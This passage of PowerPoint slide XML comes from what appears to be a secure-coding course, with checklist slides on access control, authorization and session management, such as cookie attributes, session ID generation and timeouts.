              <a:t>Identify all resources that must be protected, and provide access only to authorized users. Consider resources such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Files, including those outside the application's direct control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protected URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protected functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Direct object references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User and data attributes and policy information used by access controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security configuration information</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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F540F4D-5E4B-4A79-B63E-2102D18FABB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-9832" y="1171753"/>
            <a:ext cx="1906715" cy="1054282"/>
            <a:chOff x="-9832" y="1171753"/>
            <a:chExt cx="1906715" cy="1054282"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2759299-6F3A-478F-B52E-979E3772E024}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="4500000">
              <a:off x="461759" y="790910"/>
              <a:ext cx="1054282" cy="1815967"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangle 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8648DD4F-EB39-4E7E-847D-73CF53ABAE77}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20723103">
              <a:off x="-9832" y="1639820"/>
              <a:ext cx="1344145" cy="230958"/>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Authorization</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C93F3EBA-6CE5-43DB-802C-9051DB064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Access Control (Slide 3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Use a centralized (e.g., sitewide) component to check for access authorization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that access authorization controls fail to the most secure state.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for access authorization on every request from components, including server-side scripts, AJAX, and Flash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deny all access if the application cannot access its security configuration information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keep code that requires privileged access separate from other unprivileged code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that representations of access control rules within the user interface match server-side values and implementation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If state data must be stored on the client, use encryption and integrity checking on the server to detect any state tampering.</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97715AB7-5CDD-4F5A-9AE1-0772DD7F4A78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-9832" y="1171753"/>
            <a:ext cx="1906715" cy="1054282"/>
            <a:chOff x="-9832" y="1171753"/>
            <a:chExt cx="1906715" cy="1054282"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF766904-8AA9-47FE-8C54-AAA8D9118AE3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="4500000">
              <a:off x="461759" y="790910"/>
              <a:ext cx="1054282" cy="1815967"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rounded Rectangle 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED123FD1-BCB0-4100-B1CC-839BA3411398}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20723103">
              <a:off x="-9832" y="1639820"/>
              <a:ext cx="1344145" cy="230958"/>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defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" kern="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Authorization</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{883B66A4-029B-4D86-B863-DD0054AB7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166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Access Control (Slide 4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Limit the number of transactions a user or device can perform in a given time period to prevent automated attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header as a supplemental check only; it should never be the sole authorization check, as it is can be spoofed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Periodically re-validate the user’s authorization to ensure that their privileges have not changed during long sessions. If they have changed, log the user out and require reauthentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable accounts that haven't been used within a prescribed period of time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that accounts can be disabled and sessions terminated when a user's authorization is removed (due to changes in role, employment status, etc.).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure service accounts (such as those providing </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>connections to another server) with the least privileges </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>needed to accomplish their work.</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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97715AB7-5CDD-4F5A-9AE1-0772DD7F4A78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-9832" y="1171753"/>
            <a:ext cx="1906715" cy="1054282"/>
            <a:chOff x="-9832" y="1171753"/>
            <a:chExt cx="1906715" cy="1054282"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF766904-8AA9-47FE-8C54-AAA8D9118AE3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="4500000">
              <a:off x="461759" y="790910"/>
              <a:ext cx="1054282" cy="1815967"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rounded Rectangle 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED123FD1-BCB0-4100-B1CC-839BA3411398}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20723103">
              <a:off x="-9832" y="1639820"/>
              <a:ext cx="1344145" cy="230958"/>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defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" kern="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Authorization</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{883B66A4-029B-4D86-B863-DD0054AB7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Session Management (Slide 1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Create session IDs only on trusted systems, such as a server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In session IDs, do not include any information that is descriptive of the application environment or any user information that would be useful to an attacker performing reconnaissance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make session IDs random and long enough (e.g., 20 bytes or longer) to prevent guesswork or brute force attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the session management controls provided by the server or framework that use algorithms that produce sufficiently random session IDs.</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB8E760-B188-4C3F-964D-07AE56CB8524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="1143000" cy="2631379"/>
            <a:chOff x="472997" y="1158532"/>
            <a:chExt cx="1143000" cy="2631379"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5124" name="Picture 4" descr="Image result for chain png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F323B2F4-F69C-4D41-BBF8-C5C40671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12596" y="2144751"/>
              <a:ext cx="1263804" cy="6319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lient png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DAD3E28-CF80-418D-8F8C-0CB63F8A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97" y="264691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web">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9128C604-FF7B-4F65-97AC-9AF2E49EF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7" y="1158532"/>
              <a:ext cx="869796" cy="8697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7F038871-F84A-41C0-8EA6-42C235CE6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12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Session Management (Slide 2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Set a restrictive domain and path for cookies containing authenticated session IDs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Put a time limit on inactive sessions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fully terminate the associated session or connection upon logout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide the ability to log out from all pages protected by authorization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Establish a session inactivity timeout that is as short as possible to support business functional requirements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enforce periodic session terminations, even when </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the session is active, providing warnings to the user </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as needed.</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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB8E760-B188-4C3F-964D-07AE56CB8524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="1143000" cy="2631379"/>
            <a:chOff x="472997" y="1158532"/>
            <a:chExt cx="1143000" cy="2631379"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5124" name="Picture 4" descr="Image result for chain png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F323B2F4-F69C-4D41-BBF8-C5C40671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12596" y="2144751"/>
              <a:ext cx="1263804" cy="6319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lient png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DAD3E28-CF80-418D-8F8C-0CB63F8A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97" y="264691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web">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9128C604-FF7B-4F65-97AC-9AF2E49EF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7" y="1158532"/>
              <a:ext cx="869796" cy="8697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7F038871-F84A-41C0-8EA6-42C235CE6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Session Management (Slide 3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Close any sessions established before login and establish a new session after successful login.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generate a new session ID and deactivate the old one periodically:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upon reauthentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the connection security changes from HTTP to HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Locate session IDs only in the HTTP cookie header, and do not expose them in URLs (e.g., GET parameters), error messages, or logs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Within an application, consistently utilize HTTPS rather than switching between HTTP and HTTPS.</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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB8E760-B188-4C3F-964D-07AE56CB8524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="1143000" cy="2631379"/>
            <a:chOff x="472997" y="1158532"/>
            <a:chExt cx="1143000" cy="2631379"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5124" name="Picture 4" descr="Image result for chain png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F323B2F4-F69C-4D41-BBF8-C5C40671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12596" y="2144751"/>
              <a:ext cx="1263804" cy="6319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lient png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DAD3E28-CF80-418D-8F8C-0CB63F8A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97" y="264691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web">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9128C604-FF7B-4F65-97AC-9AF2E49EF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7" y="1158532"/>
              <a:ext cx="869796" cy="8697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8FB1BBFF-2363-4AB8-976D-AE2100353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4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4FDD42-342B-466C-98FD-F820E970C55F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture Placeholder 5" descr="A picture containing object, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{494E9E59-7B71-4133-A079-87B3E42D871F}"/>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4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A9A3585-93D7-4146-BCC2-3582BC356402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit Access Using Login and User Roles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1348744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Session Management (Slide 4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77634"/>
            <a:ext cx="6897076" cy="5246070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supplement standard session management for sensitive or critical operations such as account management—for example, using per-session strong random tokens or parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute for cookies transmitted over a TLS connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect session data on the server from unauthorized access by implementing appropriate access controls on the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apply the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute to cookies, unless you </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>specifically require client-side scripts within your </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>application to read or set a cookie's value.</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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB8E760-B188-4C3F-964D-07AE56CB8524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="1143000" cy="2631379"/>
            <a:chOff x="472997" y="1158532"/>
            <a:chExt cx="1143000" cy="2631379"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5124" name="Picture 4" descr="Image result for chain png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F323B2F4-F69C-4D41-BBF8-C5C40671A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12596" y="2144751"/>
              <a:ext cx="1263804" cy="6319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lient png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DAD3E28-CF80-418D-8F8C-0CB63F8A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97" y="264691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web">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9128C604-FF7B-4F65-97AC-9AF2E49EF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7" y="1158532"/>
              <a:ext cx="869796" cy="8697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8FB1BBFF-2363-4AB8-976D-AE2100353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2CFF-AD03-4646-B33A-C0CAA1256325}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Provisioning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F74D01D-C443-4EAA-A005-A8486F6DF6BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The process of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
